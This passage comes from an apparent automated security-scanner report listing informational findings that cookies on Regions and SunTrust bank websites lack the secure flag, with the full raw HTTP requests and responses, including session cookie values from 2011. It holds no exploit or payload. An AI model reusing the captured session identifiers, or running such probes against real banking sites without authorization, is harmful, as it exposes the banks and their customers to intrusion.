Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/loan_payment_hardship.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 181

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/loan_payment_hardship.rf">here</a>.</h2>
</body></html>

10.117. https://www.regions.com/personal_banking/loans_credit.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/loans_credit.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/loans_credit.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/loans_credit.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/loans_credit.rf">here</a>.</h2>
</body></html>

10.118. https://www.regions.com/personal_banking/mobile_banking.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/mobile_banking.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/mobile_banking.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/mobile_banking.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 174

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/mobile_banking.rf">here</a>.</h2>
</body></html>

10.119. https://www.regions.com/personal_banking/money_market_main.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/money_market_main.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

www.regions.com-ssl=R1752032910; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/money_market_main.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/money_market_main.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 177

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/money_market_main.rf">here</a>.</h2>
</body></html>

10.120. https://www.regions.com/personal_banking/morgan_keegan.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/morgan_keegan.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/morgan_keegan.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/morgan_keegan.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 173

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/morgan_keegan.rf">here</a>.</h2>
</body></html>

10.121. https://www.regions.com/personal_banking/open_account.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/open_account.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/open_account.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/open_account.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 172

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/open_account.rf">here</a>.</h2>
</body></html>

10.122. https://www.regions.com/personal_banking/platinum_visa_check.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/platinum_visa_check.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/platinum_visa_check.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/platinum_visa_check.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/platinum_visa_check.rf">here</a>.</h2>
</body></html>

10.123. https://www.regions.com/personal_banking/private_client.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/private_client.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/private_client.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/private_client.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 174

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/private_client.rf">here</a>.</h2>
</body></html>

10.124. https://www.regions.com/personal_banking/regionsnet.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/regionsnet.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/regionsnet.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/regionsnet.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 170

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet.rf">here</a>.</h2>
</body></html>

10.125. https://www.regions.com/personal_banking/regionsnet_bill_pay.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/regionsnet_bill_pay.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/regionsnet_bill_pay.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/regionsnet_bill_pay.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/regionsnet_bill_pay.rf">here</a>.</h2>
</body></html>

10.126. https://www.regions.com/personal_banking/retirement_planning.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/retirement_planning.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/retirement_planning.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/retirement_planning.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 179

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/retirement_planning.rf">here</a>.</h2>
</body></html>

10.127. https://www.regions.com/personal_banking/savings_cds.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/savings_cds.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/savings_cds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/savings_cds.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/savings_cds.rf">here</a>.</h2>
</body></html>

10.128. https://www.regions.com/personal_banking/trust_asset.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /personal_banking/trust_asset.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personal_banking/trust_asset.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/personal_banking/trust_asset.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 171

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/personal_banking/trust_asset.rf">here</a>.</h2>
</body></html>

10.129. https://www.regions.com/small_business.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /small_business.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /small_business.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24375


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.130. https://www.regions.com/system/gateway.rf

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /system/gateway.rf

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /system/gateway.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.regions.com/system/gateway.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 157

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.regions.com/system/gateway.rf">here</a>.</h2>
</body></html>

10.131. https://www.regions.com/templateOverview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /templateOverview.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /templateOverview.aspx HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25921


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

10.132. https://www.regions.com/virtualMedia/img2297.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2297.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2297.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 5484
Content-Type: image/gif
Last-Modified: Mon, 07 Jun 2010 17:39:23 GMT
Accept-Ranges: bytes
ETag: "20c8e25d686cb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

...[SNIP]...

10.133. https://www.regions.com/virtualMedia/img2608.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2608.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2608.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 4948
Content-Type: image/gif
Last-Modified: Tue, 26 Oct 2010 17:36:44 GMT
Accept-Ranges: bytes
ETag: "b0b6855b3475cb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

...[SNIP]...

10.134. https://www.regions.com/virtualMedia/img2853.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2853.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2853.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 28854
Content-Type: image/jpeg
Last-Modified: Wed, 26 Jan 2011 15:40:17 GMT
Accept-Ranges: bytes
ETag: "60c215556fbdcb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

...[SNIP]...

10.135. https://www.regions.com/virtualMedia/img2859.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2859.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2859.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 3492
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 15:21:16 GMT
Accept-Ranges: bytes
ETag: "a044d735becb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:17 GMT

...[SNIP]...

10.136. https://www.regions.com/virtualMedia/img2861.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img2861.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img2861.gif HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 4877
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 16:22:00 GMT
Accept-Ranges: bytes
ETag: "504d5e533ebecb1:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

...[SNIP]...

10.137. https://www.regions.com/virtualMedia/img482.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.regions.com
Path:   /virtualMedia/img482.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /virtualMedia/img482.jpg HTTP/1.1
Host: www.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55; www.regions.com-ssl=R1752032910

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-ssl=R1752032910; path=/
Content-Length: 4923
Content-Type: image/jpeg
Last-Modified: Wed, 26 Sep 2007 05:35:18 GMT
Accept-Ranges: bytes
ETag: "10151b6ffffc71:7c0f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 15:49:18 GMT

...[SNIP]...

10.138. https://www.suntrust.com/imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.suntrust.com
Path:   /imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /imageserver/plumtree/common/private/js/jsincluder/LATEST/PTIncluder.js HTTP/1.1
Host: www.suntrust.com
Connection: keep-alive
Referer: https://www.suntrust.com/portal/server.pt/community/checking_account_selector'/440
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:59:29 GMT
Content-Type: application/x-javascript
Last-Modified: Tue, 21 Oct 2008 20:11:32 GMT
Accept-Ranges: bytes
ETag: "8fb1ea35b933c91:228d"
Server: Microsoft-IIS/6.0
Host-Name: P13B
X-Powered-By: ASP.NET
Set-Cookie: BIGipServerwww.suntrust.com-pvic=1000473610.20480.0000; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 3569


PTIncluder = function() {}

PTIncluder.VERSION            = '246682';
PTIncluder.INCLUDES_FILE    = 'component.js';
PTIncluder.PT_DEBUG_COOKIE    = 'PT_DEBUG';
PTIncluder.supportedLocales = {};
PTIncluder.sup
...[SNIP]...

10.139. https://www.supermedia.com/spportal/spportalFlow.do

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.supermedia.com
